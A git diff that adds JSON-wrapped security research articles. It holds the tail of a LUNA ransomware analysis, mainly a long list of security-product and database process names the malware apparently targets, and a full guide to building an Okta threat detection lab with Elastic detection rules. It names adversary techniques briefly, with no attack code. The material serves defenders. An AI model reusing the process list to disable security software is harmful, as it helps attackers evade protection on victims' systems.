.execaunst.execavrep.execavrid.execavscan.execavtray.execcap.execcapp.execcemflsv.execcenter.execcevtmgr.execcflic0.execcflic4.execclaw.execcm messaging.execcnfagent.execcprovsp.execcproxy.execcpxysvc.execcschedulersvc.execcsetmgr.execcsmagtd.execcsvchst.execcsystemreport.execctray.execcupdate.execdm.execertificateprovider.execertificationmanagerservicent.execfftplugin.execfnotsrvd.execfp.execfpconfg.execfpconfig.execfplogvw.execfpsbmit.execfpupdat.execfsmsmd.execheckup.exechrome.execis.execistray.execka.execlamscan.execlamtray.execlamwin.execlient.execlient64.execlps.execlpsla.execlpsls.execlshield.execmdagent.execmdinstall.execmgrdian.execntaosmgr.execollwrap.execomhost.execonfig_api_service.execonsole.execontrol_panel.execoreframeworkhost.execoreserviceshell.execpd.execpdclnt.execpf.execpntsrv.execramtray.execrashrep.execrdm.execrssvc.execsacontrol.execsadmin.execsauth.execsdbsync.execsfalconservice.execsinject.execsinsm32.execsinsmnt.execslog.execsmon.execsradius.execsrss_tc.execssauth.execstacacs.exectdataload.execwbunnav.execylancesvc.execylanceui.exedao_log.exedbeng50.exedbserv.exedbsnmp.exedbsrv9.exedefwatchdefwatch.exedeloeminfs.exedeteqt.agent.exediskmon.exedjsnetcn.exedlservice.exedltray.exedolphincharge.edolphincharge.exedoscan.exedpmra.exedr_serviceengine.exedrwagntd.exedrwagnui.exedrweb.exedrweb32.exedrweb32w.exedrweb386.exedrwebcgp.exedrwebcom.exedrwebdc.exedrwebmng.exedrwebscd.exedrwebupw.exedrwebwcl.exedrwebwin.exedrwinst.exedrwupgrade.exedsmcad.exedsmcsvc.exedwarkdaemon.exedwengine.exedwhwizrd.exedwnetfilter.exedwrcst.exedwwin.exeedisk.exeeeyeevnt.exeegui.exeehttpsrv.exeekrn.exeelogsvc.exeemlibupdateagentnt.exeemlproui.exeemlproxy.exeencsvc.exeendpointsecurity.exeengineserver.exeentitymain.exeepmd.exeera.exeerlsrv.exeesecagntservice.exeesecservice.exeesmagent.exeetagent.exeetconsole3.exeetcorrel.exeetloganalyzer.exeetreporter.exeetrssfeeds.exeetscheduler.exeetwcontrolpanel.exeeuqmonitor.exeeventparser.exeevtarmgr.exeevtmgr.exeevtprocessecfile.exeewidoctrl.exeexcel.exeexecstat.exefameh32.exefcappdb.exefcdblog.exefch32.exefchelper64.exefcsms.exefcssas.exefih32.exefirefox.exefirefoxconfig.exefiresvc.exefiretray.exefirewallgui.exefmon.exefnplicensingservice.exeforcefield.exefpavserver.exefprottray.exeframeworkservicframeworkservic.exeframeworkservice.exefrzstate2k.exefsaa.exefsaua.exefsav32.exefsavgui.exefscuif.exefsdfwd.exefsgk32.exefsgk32st.exefsguidll.exefsguiexe.exefshdll32.exefshoster32.exefshoster64.exefsm32.exefsma32.exefsmb32.exefsorsp.exefspc.exefspex.exefsqh.exefssm32.exefwcfg.exefwinst.exe | fws.exegcascleaner.exegcasdtserv.exegcasinstallhelper.exegcasnotice.exegcasserv.exegcasservalert.exegcasswupdater.exeGdfirewalltray.exegdfwsvc.exegdscan.exegfireporterservice.exeghost_2.exeghosttray.exegiantantispywaremain.exegiantantispywareupdater.exegooglecrashhandler.exegooglecrashhandler64.exegoogleupdate.exegziface.exegzserv.exehasplmv.exehdb.exehealthservice.exehpqwmiex.exehwapi.exeicepack.exeidsinst.exeiface.exeigateway.exeilicensesvc.exeinet_gethost.exeinfopath.exeinicio.exeinonmsrv.exeinorpc.exeinort.exeinotask.exeinoweb.exeisafe.exeisafinst.exeisntsmtp.exeisntsysmonitorispwdsvc.exeisqlplussvc.exeisscsf.exeissdaemon.exeissvc.exeisuac.exeiswmgr.exeitmrt_supportdiagnostics.exeitmrt_trace.exeitmrtsvc.exeixaptsvc.exeixavsvc.exeixfwsvc.exekabackreport.exekaccore.exekanmcmain.exekansgui.exekansvr.exekb891711.exekeysvc.exekis.exekislive.exekissvc.exeklnacserver.exeklnagent.exeklserver.exeklswd.exeklwtblfs.exekmailmon.exeknownsvr.exeknupdatemain.exekpf4gui.exekpf4ss.exekpfw32.exekpfwsvc.exekrbcc32s.exekswebshield.exekvdetech.exekvmonxp.kxpkvmonxp_2.kxpkvolself.exekvsrvxp.exekvsrvxp_1.exekvxp.kxpkwatch.exekwsprod.exekxeserv.exeleventmgr.exelivesrv.exelmon.exelog_qtine.exeloggetor.exeloggingserver.exeluall.exelucallbackproxy.exelucoms.exelucoms~1.exelucomserver.exelwdmserver.exemacmnsvc.exemacompatsvc.exemanagementagenthost.exemanagementagentnt.exemantispm.exemasalert.exemassrv.exemasvc.exembamservice.exembamtray.exemcagent.exemcapexe.exemcappins.exemcconsol.exemcdash.exemcdetect.exemcepoc.exemcepocfg.exemcinfo.exemcmnhdlr.exemcmscsvc.exemcnasvc.exemcods.exemcpalmcfg.exemcpromgr.exemcproxy.exemcregwiz.exemcsacore.exemcscript_inuse.exemcshell.exemcshield.exemcshld9x.exemcsvhost.exemcsysmon.exemctray.exemctskshd.exemcui32.exemcuimgr.exemcupdate.exemcupdmgr.exemcvsftsn.exemcvsrte.exemcvsshld.exemcwce.exemcwcecfg.exemfeann.exemfecanary.exemfeesp.exemfefire.exemfefw.exemfehcs.exemfemactl.exemfemms.exemfetp.exemfevtps.exemfewc.exemfewch.exemgavrtcl.exemghtml.exemgntsvc.exemonitoringhost.exemonsvcnt.exemonsysnt.exempcmdrun.exempf.exempfagent.exempfconsole.exempfservice.exempfsrv.exempftray.exemps.exempsevh.exempsvc.exemrf.exemsaccess.exemsascui.exemscifapp.exemsdtssrvr.exemsftesql.exemskagent.exemskdetct.exemsksrver.exemsksrvr.exemsmdsrv.exemsmpeng.exemspmspsv.exemspub.exemsscli.exemsseces.exemsssrv.exemusnotificationux.exemyagttry.exemydesktopqos.exemydesktopservice.exemysqld.exemysqld-nt.exemysqld-opt.exenailgpip.exenaprdmgr.exenavectrl.exenavelog.exenavesp.exenavshcom.exenavw32.exenavwnt.exencdaemon.exend2svc.exendetect.exendrvs.exendrvx.exeneotrace.exenerosvc.exenetalertclient.exenetcfg.exenetsession_win.exenetworkagent.exenexengctw32.exengserver.exenimbus.exenimcluster.exenip.exenipsvc.exenisoptui.exenisserv.exenissrv.exenisum.exenjeeves.exenlclient.exenlsvc.exenmagent.exenmain.exenortonsecurity.exenpfmntor.exenpfmsg.exenpfmsg2.exenpfsvice.exenpmdagent.exenprotect.exenpscheck.exenpssvc.exenrmenctb.exenscsrvce.exensctop.exenslocollectorservice.exensmdemf.exensmdmon.exensmdreal.exensmdsch.exensmdtr.exentcaagent.exentcadaemon.exentcaservice.exentevl.exentrtscan.exentservices.exenvcoas.exenvcsched.exenymse.exeoasclnt.exeocautoupds.exeocomm.exeocssd.exeoespamtest.exeofcdog.exeofcpfwsvc.exeokclient.exeolfsnt40.exeomniagent.exeomslogmanager.exeomtsreco.exeonenote.exeonlinent.exeonlnsvc.exeop_viewer.exeopscan.exeoracle.exeoutlook.exeoutpost.exepaamsrv.exepadfsvr.exepagent.exepagentwd.exepasystemtray.exepatch.exepatrolagent.exepatrolperf.exepavbckpt.exepavfires.exepavfnsvr.exepavjobs.exepavkre.exepavmail.exepavreport.exepavsched.exepavsrv50.exepavsrv51.exepavsrv52.exepavupg.exepaxton.net2.clientservice.exepaxton.net2.commsserverservice.exepccclient.exepccguide.exepcclient.exepccnt.exepccntmon.exepccntupd.exepccpfw.exepcctlcom.exepcscan.exepcscm.exepcscnsrv.exepcsws.exepctsauxs.exepctsgui.exepctssvc.exepctstray.exepep.exepersfw.exepmgreader.exepmon.exepnmsrv.exepntiomon.exePop3pack.exepop3trap.exepoproxy.exepowerpnt.exeppclean.exeppctlpriv.exe | ppmcativedetection.exeppppwallrun.exepqibrowser.exepqv2isvc.exepralarmmgr.exeprcalculationmgr.exeprconfigmgr.exeprdatabasemgr.exepremailengine.exepreventmgr.exeprevsrv.exeprftpengine.exeprgateway.exeprintdevice.exeprivacyiconclient.exeprlicensemgr.exeprocexp.exeproficy administrator.exeproficyclient.exe4proficypublisherservice.exeproficyserver.exeproficysts.exeproutil.exeprprintserver.exeprproficymgr.exeprrds.exeprreader.exeprrouter.exeprschedulemgr.exeprstubber.exeprsummarymgr.exeprunsrv.exeprwriter.exepsanhost.exepsctris.exepsctrls.exepsh_svc.exepshost.exepsimreal.exepsimsvc.exepskmssvc.exepsuamain.exepsuaservice.exepthosttr.exepview.exepviewer.exepwdfilthelp.exepxemtftp.exepxeservice.exeqclean.exeqdcsfs.exeqoeloader.exeqserver.exerapapp.exerapuisvc.exeras.exerasupd.exerav.exeravmon.exeravmond.exeravservice.exeravstub.exeravtask.exeravtray.exeravupdate.exeravxp.exercsvcmon.exerdrcef.exerealmon.exeredirsvc.exeregmech.exeremupd.exerepmgr64.exereportersvc.exereportingservicesservice.exereportsvc.exeretinaengine.exerfwmain.exerfwproxy.exerfwsrv.exerfwstub.exernav.exernreport.exerouternt.exerpcserv.exerscd.exerscdsvc.exersnetsvr.exerssensor.exerstray.exertvscan.exerulaunch.exesafeservice.exesahookmain.exesaservice.exesav32cli.exesavfmsectrl.exesavfmselog.exesavfmsesjm.exesavfmsesp.exesavfmsespamstatsmanager.exesavfmsesrv.exesavfmsetask.exesavfmseui.exesavmain.exesavroam.exesavscan.exesavservice.exesavui.exesbamsvc.exesbserv.exescan32.exescanexplicit.exescanfrm.exescanmailoutlook.exescanmsg.exescanwscs.exescfagent_64.exescfmanager.exescfservice.exescftray.exeschdsrvc.exeschupd.exesdrservice.exesdtrayapp.exeseanalyzertool.exeseccenter.exesecuritycenter.exesecuritymanager.exeseestat.exesemsvc.exeserver_eventlog.exeserver_runtime.exesesclu.exesetloadorder.exesetupguimngr.exesevinst.exesgbhp.exeshstat.exesidebar.exesiteadv.exeslee81.exesmc.exesmcgui.exesmex_activeupdasmex_master.exesmex_remoteconfsmex_systemwatcsmoutlookpack.exesms.exesmsectrl.exesmselog.exesmsesjm.exesmsesp.exesmsesrv.exesmsetask.exesmseui.exesmsx.exesnac.exesndmon.exesndsrvc.exesnhwsrv.exesnicheckadm.exesnichecksrv.exesnicon.exesnsrv.exespbbcsvc.exespideragent.exespiderml.exespidernt.exespiderui.exespntsvc.exespooler.exespyemergency.exespyemergencysrv.exesqbcoreservice.exesqlagent.exesqlbrowser.exesqlservr.exesqlwriter.exesrvload.exesrvmon.exesschk.exessecuritymanager.exessm.exessp.exessscheduler.exestarta.exesteam.exestinger.exestopa.exestopp.exestwatchdog.exesvcgenerichostsvcharge.exesvcntaux.exesvdealer.exesvframe.exesvtray.exeswc_service.exeswdsvc.exesweepsrv.sysswi_service.exeswnetsup.exeswnxt.exeswserver.exesymlcsvc.exesymproxysvc.exesymsport.exesymtray.exesymwsc.exesynctime.exesysdoc32.exesysoptenginesvc.exetaskhostw.exetbirdconfig.exetbmon.exetclproc.exetdimon.exeteamviewer_service.exetfgui.exetfservice.exetftray.exetfun.exethebat.exethebat64.exethunderbird.exetiaspn~1.exetmas.exetmlisten.exetmntsrv.exetmpfw.exetmproxy.exetnbutil.exetnslsnr.exetoolbarupdater.exetpsrv.exetraflnsp.exetraptrackermgr.exetrjscan.exetrupd.exetsansrf.exetsatisy.exetscutynt.exetsmpnt.exeucservice.exeudaterui.exeuiseagnt.exeuiwatchdog.exeumxagent.exeumxcfg.exeumxfwhlp.exeumxpol.exeunsecapp.exeunvet32.exeup2date.exeupdate_task.exeupdaterui.exeupdtnv28.exeupfile.exeuplive.exeuploadrecord.exeupschd.exeurl_response.exeurllstck.exeuseractivity.exeuseranalysis.exeusergate.exeusrprmpt.exev2iconsole.exev3clnsrv.exev3exec.exev3imscn.exev3lite.exev3main.exev3medic.exev3sp.exev3svc.exevetmsg.exevettray.exevgauthservice.exevisio.exevmacthlp.exevmtoolsd.exevmware-converter.exevmware-converter-a.exevmwaretray.exevpatch.exevpc32.exevpdn_lu.exevprosvc.exevprot.exevptray.exevrv.exevrvmail.exevrvmon.exevrvnet.exevshwin32.exevsmain.exevsmon.exevsserv.exevsstat.exevstskmgr.exewebproxy.exewebscanx.exewebsensecontrolservice.exewebtrapnt.exewfxctl32.exewfxmod32.exewfxsnt40.exewin32sysinfo.exewinlog.exewinroute.exewinvnc4.exewinword.exewordpad.exeworkflowresttest.exewrctrl.exewrsa.exewrspysetup.exewscntfy.exewssfcmai.exewtusystemsuport.exexcommsvr.exexfilter.exexfssvccon.exezanda.exezapro.exezavcore.exezillya.exezlclient.exezlh.exezonealarm.exezoolz.exe |\n"
+ },
+ "title": "LUNA Ransomware Attack Pattern Analysis",
+ "slug": "luna-ransomware-attack-pattern",
+ "subtitle": "LUNA attack pattern and malware observations",
+ "date": "2022-08-31",
+ "description": "In this research publication, we'll explore the LUNA attack pattern — a cross-platform ransomware variant.",
+ "author": [
+ {
+ "slug": "salim-bitam"
+ },
+ {
+ "slug": "seth-goodwin"
+ },
+ {
+ "slug": "andrew-pease"
+ },
+ {
+ "slug": "daniel-stepanic"
+ }
+ ],
+ "image": "dark-side-of-moon-flickr-earth-shine-thumbnail.jpeg",
+ "category": [
+ {
+ "slug": "attack-pattern"
+ }
+ ],
+ "tags": [
+ "luna",
+ "ref5264"
+ ]
+ },
+ "id": "security_labs_content-luna_ransomware_attack_pattern-md",
+ "type": "security_labs_content"
+}
diff --git a/packages/security_labs_content/kibana/security_labs_content/security_labs_content-monitoring_okta_threats_with_elastic_security-md.json b/packages/security_labs_content/kibana/security_labs_content/security_labs_content-monitoring_okta_threats_with_elastic_security-md.json
new file mode 100644
index 00000000000..194743b8960
--- /dev/null
+++ b/packages/security_labs_content/kibana/security_labs_content/security_labs_content-monitoring_okta_threats_with_elastic_security-md.json
@@ -0,0 +1,25 @@
+{
+ "attributes": {
+ "raw": {
+ "document": "---\ntitle: \"Monitoring Okta threats with Elastic Security\"\nsubtitle: \"Setup a detection engineering lab for Okta\"\nslug: \"monitoring-okta-threats-with-elastic-security\"\ndate: \"2024-02-23\"\ndescription: \"This article guides readers through establishing an Okta threat detection lab, emphasizing the importance of securing SaaS platforms like Okta. It details creating a lab environment with the Elastic Stack, integrating SIEM solutions, and Okta.\"\nauthor:\n - slug: terrance-dejesus\nimage: \"photo-edited-03.png\"\ncategory:\n - slug: security-research\n---\n\n## Preamble\n\nWelcome to another installment of Okta threat research with Elastic. [Previously](https://www.elastic.co/security-labs/starter-guide-to-understanding-okta), we have published articles exploring Okta’s core services and offerings. This article is dedicated to the practical side of cyber defense - setting up a robust Okta threat detection lab. Our journey will navigate through the intricacies of configuring a lab environment using the Elastic Stack, integrating SIEM solutions, and seamlessly connecting with Okta.\n\nThe goal of this article is not just to inform but to empower. Whether you're a seasoned cybersecurity professional or a curious enthusiast, our walkthrough aims to equip you with the knowledge and tools to understand and implement advanced threat detection mechanisms for Okta environments. We believe that hands-on experience is the cornerstone of effective cybersecurity practice, and this guide is crafted to provide you with a practical roadmap to enhance your security posture.\n\nAs we embark on this technical expedition, remember that the world of cybersecurity is dynamic and ever-evolving. The methods and strategies discussed here are a reflection of the current landscape and best practices. We encourage you to approach this guide with a mindset of exploration and adaptation, as the techniques and tools in cybersecurity are continually advancing.\n\nSo, let's dive into our detection lab setup for Okta research.\n\n## Prerequisites\n\nFor starters, an Okta license (a [trial license](https://www.okta.com/free-trial/) is fine) is required for this lab setup. This will at least allow us to generate Okta system logs within our environment, which we can then ingest into our Elastic Stack.\n\nSecondarily, after Okta is set up, we can deploy a Windows Server, set up Active Directory (AD), and use the [AD integration](https://help.okta.com/en-us/content/topics/directory/ad-agent-main.htm) in Okta to sync AD with Okta for Identity and Access Management (IAM). This step is not necessary for the rest of the lab, however, it can help extend our lab for other exercises and scenarios where endpoint and Okta data are both necessary for hunting.\n\n## Sign up for Okta Workforce Identity\n\nWe will set up a fresh Okta environment for this walkthrough by signing up for a Workforce Identity Cloud trial. If you already have an Okta setup in your environment, then feel free to skip to the `Setting Up the Elastic Stack` section.\n\nOnce signed up for the trial, you are typically presented with a URL containing a trial license subdomain and the email to log into the Okta admin console.\n\nTo start, users must pivot over to the email they provided when signing up and follow the instructions of the activation email by Okta, which contains a QR code to scan. \n\nThe QR code is linked to the Okta Verify application that is available on mobile devices, iOS and Android. A prompt on the mobile device for multi-factor authentication (MFA) using a phone number and face recognition is requested. \n\n\n\n_Image 1: Setting up Okta Verify through a mobile device_\n\nOnce set up, we are redirected to the Okta admin console to configure MFA using Okta Verify.\n\n\n\n_Image 2: The Okta Admin console_\n\nAt this point, you should have a trial license for Okta, have setup MFA, and have access to the Okta admin console.\n\n## Setting up your free cloud stack\n\nFor this lab, we will use a [free trial](https://cloud.elastic.co/registration) of an Elastic Cloud instance. You also have the option to create the stack in [Amazon Web Services](https://www.elastic.co/partners/aws?utm_campaign=Comp-Stack-Trials-AWSElasticsearch-AMER-NA-Exact&utm_content=Elasticsearch-AWS&utm_source=adwords-s&utm_medium=paid&device=c&utm_term=amazon%20elk&gclid=Cj0KCQiA1ZGcBhCoARIsAGQ0kkqI9gFWLvEX--Fq9eE8WMb43C9DsMg_lRI5ov_3DL4vg3Q4ViUKg-saAsgxEALw_wcB) (AWS), [GCP](https://www.elastic.co/guide/en/cloud/current/ec-billing-gcp.html), or Microsoft Azure if you’d like to set up your stack in an existing cloud service provider (CSP). Ensure you [enable MFA for your Elastic Cloud environment](https://www.elastic.co/guide/en/cloud/current/ec-account-user-settings.html#ec-account-security-mfa).\n\nOnce registered for the free trial, we can focus on configuring the Elastic Stack deployment. For this lab, we will call our deployment okta-threat-detection and deploy it in GCP. It is fine to leave the default settings for your deployment, and we recommend the latest version for all the latest features. For the purposes of this demo, we use the following:\n\n - Name: okta-threat-detection\n - Cloud provider: Google Cloud\n - Region: Iowa (us-central1)\n - Hardware profile: Storage optimized\n - Version: 8.12.0 (latest)\n\nThe option to adjust additional settings for Elasticsearch, Kibana, Integrations, and more is configurable during this step. However, default settings are fine for this lab exercise. If you choose to leverage the Elastic Stack for a more permanent, long-term strategy, we recommend planning and designing architecturally according to your needs.\n\nOnce set, select “Create deployment” and the Elastic Stack will automatically be deployed in GCP (or whatever cloud provider you selected). You can download the displayed credentials as a CSV file or save them wherever you see fit. The deployment takes approximately 5 minutes to complete and once finished, you can select “Continue” to log in. Congratulations, you have successfully deployed the Elastic Stack within minutes!\n\n\n\n_Image 3: Your newly deployed Elastic stack_\n\n## Setup Fleet from the Security Solution\n\nAs a reminder, [Fleet](https://www.elastic.co/guide/en/fleet/current/fleet-overview.html) enables the creation and management of an agent policy, which will incorporate the [Okta integration](https://docs.elastic.co/en/integrations/okta) on an Elastic Agent. This integration is used to access and ingest Okta logs into our stack.\n\n### Create an Okta policy\n\nFor our Elastic Agent to know which integration it is using, what data to gather, and where to stream that data within our stack, we must first set up a custom Fleet policy we’re naming Okta.\n\nTo set up a fleet policy within your Elastic Stack, do the following in your Elastic Stack:\n\n 1. Navigation menu > Management > Fleet > Agent Policies > Create agent policy\n 2. Enter “Okta” as a name > Create Agent Policy\n\n\n\n_Image 4: Fleet agent policies page in Elastic Stack_\n\n## Setup the Okta integration\n\nOnce our policy is established, we need to install the Okta integration for the Elastic Stack we just deployed.\n\nBy selecting the “Okta” name in the agent policies that was just created, we need to add the Okta integration by selecting “Add integration” as shown below.\n\n\n\n_Image 5: The Okta integration within the agent policies_\n\nTyping “Okta” into the search bar will show the Okta integration that needs to be added. Select this integration and the following prompt should appear.\n\n\n\n_Image 6: The Okta Integration page_\n\nBy selecting “Add Okta” we can now begin to set up the integration with a simple step-by-step process, complimentary to adding our first integration in the Elastic Stack.\n\n\n\n_Image 7: Adding integrations into the Elastic Stack_\n\n## Install the Elastic Agent on an endpoint\n\nAs previously mentioned, we have to install at least one agent on an endpoint to access data in Okta, associated with the configured Okta policy. We recommend a lightweight Linux host, either as a VM locally or in a CSP such as GCP, to keep everything in the same environment. For this publication, I will use a VM instance of [Ubuntu 20.04 LTS](https://releases.ubuntu.com/focal/) VM in Google’s Compute Engine (GCE). Your endpoint can be lightweight, such as GCP N1 or E2 series, as its sole purpose is to run the Elastic Agent.\n\nSelect the “Install Elastic Agent” button and select which host the agent will be installed on. For this example, we will be using a Linux host. Once selected, a “Copy” option is available to copy and paste the commands into your Linux console, followed by execution.\n\n\n\n_Image 8: Install Elastic Agent_\n\n## Create an Okta token\nAt this point, we need an API key and an Okta system logs API URL for the integration setup. Thus, we must pivot to the Okta admin console to create the API token.\n\n\n\n_Image 9: Access the Okta Admin console_\n\nFrom the Okta admin console, select the following:\n\n 1. Security > API > Tokens\n 2. Select the “Create token” button\n\nIn this instance, we name the API token “elastic”. Since my administrator account creates the token, it inherits the permissions and privileges of my account. In general, we recommend creating a separate user and scoping permissions properly with principle-of-least-privilege (PoLP) for best security practices. I recommend copying the provided API token key to the clipboard, as it is necessary for the Okta integration setup.\n\n\n\n_Image 10: Copy your API token_\n\nWe also need to capture the Okta API Logs URL, which is our HTTPS URL with the URI ```/api/v1/logs``` or system logs API endpoint.\n\nFor example: ```https://{okta-subdomain}.okta.com/api/v1/logs```\n\nThe Elastic Agent, using the Okta integration, will send requests to this API URL with our API token included in the authorization header of the requests as a Single Sign-On for Web Systems (SSWS) token. With this information, we are ready to finalize our Okta integration setup in the Elastic Stack.\n\n## Add Okta integration requirements\n\nPivoting back to the Okta integration setup in the Elastic Stack, it requires us to add the API token and the Okta System logs API URL as shown below. Aside from this, we change the “Initial Interval” from 24 hours to 2 minutes. This will help check for Okta logs immediately after we finish our setup.\n\n\n\n_Image 11: Configure log collection_\n\nOnce this information is submitted to the Okta integration setup, we can select the “Confirm incoming data” button to verify that logs are properly being ingested from the Elastic Agent.\n\n\n\n_Image 12: Preview data from Okta_\n\nWhile we have confirmed that data is in fact being ingested from the Elastic Agent, we must also confirm that we have Okta-specific logs being ingested. I would suggest that you take a moment to pivot back to Okta and change some settings in the admin console. This will then generate Okta system logs that will eventually be extracted by our Elastic Agent and ingested into our Elastic Stack. Once completed, we can leverage the Discover feature within Kibana to search for the Okta system logs that should have been generated.\n\nThe following query can help us accomplish this - ```event.dataset:okta*```\n\n\n\n_Image 13: Use Discover to explore your Okta data_\n\nIf you have managed to find Okta logs from this, then congratulations rockstar, you have successfully completed these steps:\n\n 1. Signed up for Okta Workforce Identity with a trial license\n 2. Deployed a trial Elastic stack via cloud.elastic.co\n 3. Deployed an agent to your host of choice\n 4. Created an Okta policy\n 5. Setup the Okta integration\n 6. Created an Okta API token\n 7. Confirmed incoming data from our Elastic agent\n\n## Enable Okta detection rules\n\nElastic has 1000+ pre-built detection rules not only for Windows, Linux, and macOS endpoints, but also for several integrations, including Okta. You can view our current existing Okta [rules](https://github.com/elastic/detection-rules/tree/main/rules/integrations/okta) and corresponding MITRE ATT&CK [coverage](https://mitre-attack.github.io/attack-navigator/#layerURL=https%3A%2F%2Fgist.githubusercontent.com%2Fbrokensound77%2F1a3f65224822a30a8228a8ed20289a89%2Fraw%2FElastic-detection-rules-indexes-logs-oktaWILDCARD.json&leave_site_dialog=false&tabs=false).\n\nTo enable Okta rules, complete the following in the Elastic Stack:\n\n 1. Navigation menu > Security > Manage > Rules\n 2. Select “Load Elastic prebuilt rules and timeline templates”\n 3. Once all rules are loaded:\n a. Select “Tags” dropdown\n b. Search “Okta”\n c. Select all rules > Build actions dropdown > Enable\n\n\n\n_Image 14: Searching for Out-of-the-Box (OOB) Okta Detection Rules_\n\nWhile we won’t go in-depth about exploring all rule information, we recommend [doing so](https://www.elastic.co/guide/en/security/current/detection-engine-overview.html). Elastic has additional information, such as related integrations, investigation guides, and much more! Also, you can add to our community by [creating your own](https://www.elastic.co/guide/en/security/current/rules-ui-create.html) detection rule with the “Create new rule” button and [contribute](https://github.com/elastic/detection-rules#how-to-contribute) it to our detection rules repository.\n\n## Let’s trigger a pre-built rule\n\nAfter all Okta rules have been enabled, we can now move on to testing alerts for these rules with some simple emulation.\n\nFor this example, let’s use the [Attempt to Reset MFA Factors for an Okta User Account](https://github.com/elastic/detection-rules/blob/main/rules/integrations/okta/persistence_attempt_to_reset_mfa_factors_for_okta_user_account.toml) detection rule that comes fresh out-of-the-box (OOB) with prebuilt detection rules.\n\n\n\n_Image 15: Enabling an OOB Okta detection rule to test alerting_\n\nTo trigger, we simply log into our Okta admin console and select a user of choice from Directory > People and then More Actions > Reset Multifactor > Reset All.\n\n\n\n_Image 16: Resetting MFA for a user in Okta_\n\nOnce complete, logs will be ingested shortly into the Elastic Stack, and the Detection Engine will run the rule’s query against datastreams whose patterns match ```logs-okta*```. If all goes as expected, an alert should be available via the Security > Alerts page in the Elastic stack.\n\n\n\n_Image 17: Alert page flyout for triggered OOB Okta detection rule_\n\n## Let’s trigger a custom rule\n\nIt is expected that not all OOTB Okta rules may be right for your environment or detection lab. As a result, you may want to create custom detection rules for data from the Okta integration. Allow me to demonstrate how you would do this.\n\nLet’s assume we have a use case where we want to identify when a unique user ID (Okta Actor ID) has an established session from two separate devices, indicating a potential web session hijack.\n\nFor this, we will rely on Elastic’s piped query language, [ES|QL](https://www.elastic.co/blog/getting-started-elasticsearch-query-language). We can start by navigating to Security > Detection Rules (SIEM) > Create new rules. We can then select ES|QL as the rule type.\n\n\n\n_Image 18: Create new rule Kibana page in Elastic security solution_\n\nTo re-create Okta system logs for this event, we would log in to Okta with the same account from multiple devices relatively quickly. For replication, I have done so via macOS and Windows endpoints, as well as my mobile phone, for variety.\n\nThe following custom ES|QL query would identify this activity, which we can confirm via Discover in the Elastic Stack before adding it to our new rule.\n\n\n\n_Image 19: Testing ES|QL query in Elastic Discover prior to rule implementation_\n\nNow that we have adjusted and tested our query and are happy with the results, we can set it as the query for our new rule.\n\n\n\n_Image 20: Creating new custom detection rule with ES|QL query logic_\n\n\n\n_Image 21: Enabled custom detection rule with ES|QL query for Okta threat_\n\nNow that our rule has been created, tested, and enabled, let’s attempt to fire an alert by replicating this activity. For this, we simply log into our Okta admin console from the same device with multiple user accounts.\n\nAs we can see, we now have an alert for this custom rule!\n\n\n\n_Image 22: Triggered alert for events matching custom detection rule_\n\n## Bonus: synchronize Active Directory (AD)\n\nAs discussed in our [previous Okta installation](https://www.elastic.co/security-labs/starter-guide-to-understanding-okta), a core service offering in Okta is to synchronize with third-party IAM directory services such as AD, Google Workspace, and others. Doing so in your lab can enable further threat detection capabilities as cross-correlation between Windows logs and Okta for users would be possible. For this article, we will step through synchronizing with AD on a local Windows Server. Note - We recommend deploying a Windows Elastic Agent to your Windows Server and setting up the [Windows](https://docs.elastic.co/en/integrations/windows) and [Elastic Defend](https://www.elastic.co/guide/en/security/current/install-endpoint.html) integrations for additional log ingestion.\n\n 1. [Setup](https://www.linkedin.com/pulse/how-install-active-directory-domain-services-windows-server-2019-/) your Windows Server (we are using WinServer 2019)\n 2. Deploy the Okta AD agent from your Okta admin console\n a. Directory > Directory Integrations\n b. Add Directory > Add Active Directory\n 3. Walk through guided steps to install Okta AD agent on Windows Server\n a. Execution of the Okta Agent executable will require a setup on the Windows Server side as well\n 4. Confirm Okta AD agent was successfully deployed\n 5. Synchronize AD with Okta\n a. Directory > Directory Integrations\n b. Select new AD integration\n c. elect “Import Now”\nChoose incremental or full import\n 6. Select which users and groups to import and import them\n\n\n\n_Image 23: Successful Okta agent deployment and synchronization with AD_\n\nOnce finished, under Directory in the Okta admin console, you should see people and groups that have been successfully imported. From here, you can emulate attack scenarios such as stolen login credentials locally (Windows host) being used to reset MFA in Okta.\n\n## Additional considerations\n\nWhile this is a basic setup of not only the Elastic Stack, Okta integration, and more for a threat research lab, there are additional considerations for our setup that are dependent on our research goals. While we won't dive into specifics nor exhaust possible scenarios, below is a list of considerations for your lab to accurately emulate an enterprise environment and/or adversary playbooks:\n\n - Is Okta my IdP source of truth? If not, set up a third party such as Azure AD (AAD) or Google Workspace and synchronize directory services.\n - Will I simulate adversary behavior - for example, SAMLjacking? If so, what third-party integrations do I need that leverage SAML for authentication?\n - Do I want to research tenant poisoning? If so, should I set up a multi-tenant architecture with Okta?\n - Do I need separate software, such as VPNs or proxies, to emulate attribution evasion when attempting to bypass MFA?\n - What other tools, such as EvilGinx, let me attempt phishing playbooks, and what is the required set up in Okta for these exercises?\n - How should I capture authorization codes during OAuth workflows, and how can I replay an exchange request for an access token?\n - For password spraying or credential stuffing, which third-party applications should I integrate, and how many should suffice for accurate detection logic?\n - How might I explore lax access policies for user profiles?\n\n## Takeaways\n\nIn this guide, we've successfully navigated the setup of an Okta threat detection lab using the Elastic Stack, highlighting the importance of safeguarding SaaS platforms like Okta. Our journey included deploying the Elastic Stack, integrating and testing Okta system logs, and implementing both pre-built and custom detection rules.\n\nThe key takeaway is the Elastic Stack's versatility in threat detection, accommodating various scenarios, and enhancing cybersecurity capabilities. This walkthrough demonstrates that effective threat management in Okta environments is both achievable and essential.\n\nAs we wrap up, remember that the true value of this exercise lies in its practical application. By establishing your own detection lab, you're not only reinforcing your security posture but also contributing to the broader cybersecurity community. Stay tuned for additional threat research content surrounding SaaS and Okta, where we'll explore common adversary attacks against Okta environments and detection strategies.\n\n"
+ },
+ "title": "Monitoring Okta threats with Elastic Security",
+ "slug": "monitoring-okta-threats-with-elastic-security",
+ "subtitle": "Setup a detection engineering lab for Okta",
+ "date": "2024-02-23",
+ "description": "This article guides readers through establishing an Okta threat detection lab, emphasizing the importance of securing SaaS platforms like Okta. It details creating a lab environment with the Elastic Stack, integrating SIEM solutions, and Okta.",
+ "author": [
+ {
+ "slug": "terrance-dejesus"
+ }
+ ],
+ "image": "photo-edited-03.png",
+ "category": [
+ {
+ "slug": "security-research"
+ }
+ ]
+ },
+ "id": "security_labs_content-monitoring_okta_threats_with_elastic_security-md",
+ "type": "security_labs_content"
+}
